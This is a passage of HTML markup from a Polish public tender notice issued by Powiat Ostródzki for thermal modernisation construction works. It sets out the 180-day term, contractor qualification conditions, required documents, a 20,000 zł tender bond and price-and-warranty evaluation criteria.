black;border-collapse: collapse;'>45410000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45442110-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45312310-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233250-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">180</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>180</TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin wykonania zamówienia: 180 dni od dnia przekazania terenu budowy, z zastrzeżeniem, że prace elewacyjne zostaną rozpoczęte nie wcześniej niż w miesiącach czerwiec-sierpień 2019 r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie ustalił szczegółowych warunków dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie ustalił szczegółowych warunków dotyczących sytuacji ekonomicznej i finansowej wykonawcy.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunkiem udziału w postępowaniu w zakresie zdolności technicznej lubzawodowej jest wykazanie, że: a) Wykonawca w okresie ostatnich pięciu lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał conajmniej jeden raz roboty budowlane polegające na termomodernizacji obiektu kubaturowego owartości co najmniej 800.000,00 zł brutto. U W A G A: 1) W przypadku składania oferty przezWykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek udziału w postępowaniu,o którym mowa w lit. a - musi spełnić co najmniej jeden z Wykonawców wspólnie ubiegających się oudzielenie zamówienia. 2) W przypadku powoływania się Wykonawcy na doświadczenie zdobyte wramach konsorcjum, musi on wykazać, że nabył to doświadczenie poprzez osobiste wykonanie częścizadania, na którą się powołuje celem spełnienia warunków udziału w niniejszym postępowaniu. 3) Wprzypadku podania przez Wykonawcę wartości wykonanych robót w walutach obcych, Zamawiającydokonana ich przeliczenia na złote polskie wg kursu NBP obowiązującego na dzień opublikowaniaogłoszenia o zamówieniu. b) Wykazanie, że Wykonawca dysponuje osobami zdolnymi do realizacjiprzedmiotu zamówienia, tj. osobami, którym zamierza powierzyć pełnienie funkcji: ? kierownikarobót ogólnobudowlanych; wskazana osoba musi posiadać uprawnienia do kierowania i nadzorowaniarobót budowlanych w specjalności konstrukcyjno-budowlanej co najmniej w ograniczonym zakresielub odpowiadające im uprawnienia nabyte w innych niż Rzeczpospolita Polska państwachczłonkowskich Unii Europejskiej, państwach członkowskich Europejskiego porozumienia o wolnymHandlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, KonfederacjiSzwajcarskiej, zgodnie z art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2018 r. poz.1202 z późn. zm.). oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacjizawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2018 r. poz. 2272); ?kierownika robót sanitarnych - wskazana osoba musi posiadać uprawnienia do kierowania inadzorowania robót budowlanych w specjalności sieci i instalacji sanitarnych co najmniej wograniczonym zakresie lub odpowiadające im uprawnienia nabyte w innych niż Rzeczpospolita Polskapaństwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego porozumienia owolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, KonfederacjiSzwajcarskiej, zgodnie z art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2018 r. poz.1202 z późn. zm.). oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacjizawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2018 r. poz. 2272); UW A G A: W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzieleniezamówienia, warunek udziału w postępowaniu, o którym mowa w lit. b - musi spełnić co najmniejjeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub łącznie ci Wykonawcy.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Poleganie na zasobach podmiotu trzeciego: 1) Wykonawca może w celupotwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznychlub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimstosunków prawnych. 2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacjizawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeślipodmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.3) Wykonawca, który polega na zdolnościach innych podmiotów, musi udowodnić Zamawiającemu, żerealizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów napotrzeby realizacji zamówienia. Treść dokumentu lub dokumentów mających potwierdzić, żeWykonawca będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należytewykonanie zamówienia publicznego oraz celem dokonania oceny, czy stosunek łączący Wykonawcę ztymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, powinna bezspornie i jednoznaczniewskazywać na: a) zakres dostępnych Wykonawcy zasobów innego podmiotu, b) sposób wykorzystaniazasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, c) zakres i okresudziału innego podmiotu przy wykonywaniu zamówienia, d) czy podmiot, na zdolnościach któregoWykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących doświadczenia,zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. 4) Zobowiązanie, októrym mowa w pkt 3 należy złożyć w oryginale wraz z ofertą.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Wykaz oświadczeń lub dokumentów składanych w postępowaniu przez Wykonawcę, na wezwanieZamawiającego w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy Pzp,tj. w zakresie braku podstaw wykluczenia: 1) w trybie art. 24 ust. 1 pkt 12 - 22 ustawy Pzp -Zamawiający nie będzie wymagał przedkładania żadnych oświadczeń i dokumentów, z zastrzeżeniempostanowienia § 6a siwz ust. 1.1 - 1.3 oraz art. 26 ust. 2f ustawy Pzp (§ 6a ust. 10 siwz); 2) w trybieart. 24 ust. 1 pkt 23 ustawy Pzp - Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronieinternetowej Zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy Pzp (§ 11 ust. 7 siwz),przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupykapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. W przypadku przynależności do tejsamej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacjepotwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji wpostępowaniu; 3) w trybie art. 24 ust. 5 pkt 1 ustawy Pzp - odpis z właściwego rejestru lub z centralnejewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu dorejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5pkt 1 ustawy Pzp, z zastrzeżeniem postanowienia art. 26 ust. 6 ustawy Pzp (§ 6a ust. 9 siwz). 2.Wykonawca, który polega na zdolnościach innych podmiotów na zasadach określonych w art. 22austawy Pzp, przedstawia w odniesieniu do tych podmiotów dokumenty wymienione w § 6a ust. 2 pkt 3siwz. 3. Dokumenty podmiotów zagranicznych: 1) Jeżeli Wykonawca ma siedzibę lub miejscezamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w § 6aust. 2 pkt 3 siwz, składa dokument wystawiony w kraju, w którym Wykonawca ma siedzibę lubmiejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości -wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2) Jeżeli w kraju, wktórym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, którejdokument dotyczy, nie wydaje się dokumentu, o którym mowa w pkt 1, zastępuje się go dokumentemzawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionychdo jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przednotariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowegolub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lubmiejsce zamieszkania tej osoby. Przepis pkt 1 stosuje się. 3) W przypadku wątpliwości co do treścidokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organówodpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejscezamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczącychtego dokumentu. 4. W przypadku wskazania przez Wykonawcę dostępności oświadczeń lubdokumentów, o których mowa w § 6a siwz ust. 2, 3, 4 i 6 w formie elektronicznej pod określonymiadresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobierasamodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty. 5. Wprzypadku wskazania przez Wykonawcę oświadczeń lub dokumentów, o których mowa w § 6a siwzust. 2, 3, 4 i 6, które znajdują się w posiadaniu Zamawiającego, w szczególności oświadczeń lubdokumentów przechowywanych przez Zamawiającego, zgodnie z art. 97 ust. 1 ustawy Pzp,Zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawyPzp, korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. 6. Wykonawca niejest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o którychmowa w art. 25 ust. 1 pkt 1 i 3 ustawy Pzp, jeżeli Zamawiający posiada oświadczenia lub dokumentydotyczące tego wykonawcy lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych bazdanych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. oinformatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2017 r. poz. 570 zpóźn. zm.). 7. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania oudzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców dozłożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegająwykluczeniu, spełniają warunki udziału w postępowaniu, a jeżeli zachodzą uzasadnione podstawy douznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożeniaaktualnych oświadczeń lub dokumentów.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykaz oświadczeń lub dokumentów, składanych w postępowaniu przez Wykonawcę na wezwanieZamawiającego w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 ustawy Pzp,tj. w zakresie spełniania warunków udziału w postępowaniu określonych w § 5 ust. 2 pkt 3 siwz: 1)określonych w lit. a: - wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnichpięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, narzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te robotybudowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostaływykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami,o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz któregoroboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterzeWykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; 2) określonych w lit. b: -wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególnościodpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wrazz informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenianiezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nieczynności oraz informacją o podstawie do dysponowania tymi osobami.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">nie dotyczy</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) Wypełniony i podpisany formularz ofertowy (zał. nr 1 do siwz). 2) W przypadku wspólnegoubiegania się o udzielenie zamówienia przez kilku Wykonawców - Wykonawca winien załączyć dooferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzieleniezamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. 3) W przypadkuustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonegopełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musijednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzieleniezamówienia publicznego, w szczególności do podpisania i złożenia oferty.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Oferta musi być zabezpieczona wadium w wysokości 20.000,00 zł (słownie: dwadzieścia tysięcyzłotych). Wadium należy wnieść w terminie do dnia 2019 - 04 -08 do godz. 10:00 w formiedopuszczonej uPzp (art. 45 ust. 6): w formie pieniądza: przelewem na konto: o PKO BP O/Gdańsk nrkonta 93 1020 1811 0000 0602 0271 6835. Wadium musi się znajdować fizycznie na koncieZamawiającego najdalej w dniu 2019 - 04 - 08 o godz. 10:00. o w innych formach dopuszczonychustawą (poręczenia bankowe lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej;gwarancje bankowe; gwarancje ubezpieczeniowe; poręczenia, o których mowa w art. 45 ust. 6 pkt 5uPzp) należy złożyć w pokoju nr 418 (III piętro - Biuro Zamówień Publicznych). W/w poręczenia igwarancje muszą być wystawione na Zamawiającego, tj. Powiat Ostródzki z siedzibą w Ostródzie 14 -100 Ostróda, ul. Jana III Sobieskiego 5, muszą być bezwarunkowe i płatne na pierwsze żądanieZamawiającego zgodnie z przesłankami utraty wadium określonymi w art. 46 ust. 4a i ust. 5 uPzp.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span 